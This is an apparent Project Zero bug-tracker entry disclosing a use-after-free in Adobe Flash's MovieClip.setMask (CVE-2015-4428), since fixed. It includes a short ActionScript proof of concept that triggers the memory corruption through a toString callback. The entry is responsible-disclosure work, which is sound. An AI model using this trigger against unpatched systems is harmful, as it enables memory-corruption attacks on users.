New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Jul 2015
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free when calling setMask
Project Member Reported by natashenka@google.com, May 15 2015 Back to list
There is a use-after-free in MovieClip.setMask. A PoC is as follows:

this.createEmptyMovieClip("l1", 1, 1, 1, 10, 10);
this.createEmptyMovieClip("l2", 2, 1, 1, 10, 10);
var thiz = this;
var n = {toString: func};
l2.setMask(n);

function func(){
	
	var test = thiz.createTextField("test", 2, 1, 1, 10, 10);
	test.removeTextField();
	trace("in func");
	return "l1";
	
	}

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
setmask.fla
4.6 KB Download
setmask.swf
720 bytes Download
Project Member Comment 1 by natashenka@google.com, May 18 2015
This is PSIRT-3715
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-4428
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit
Sign in to add a comment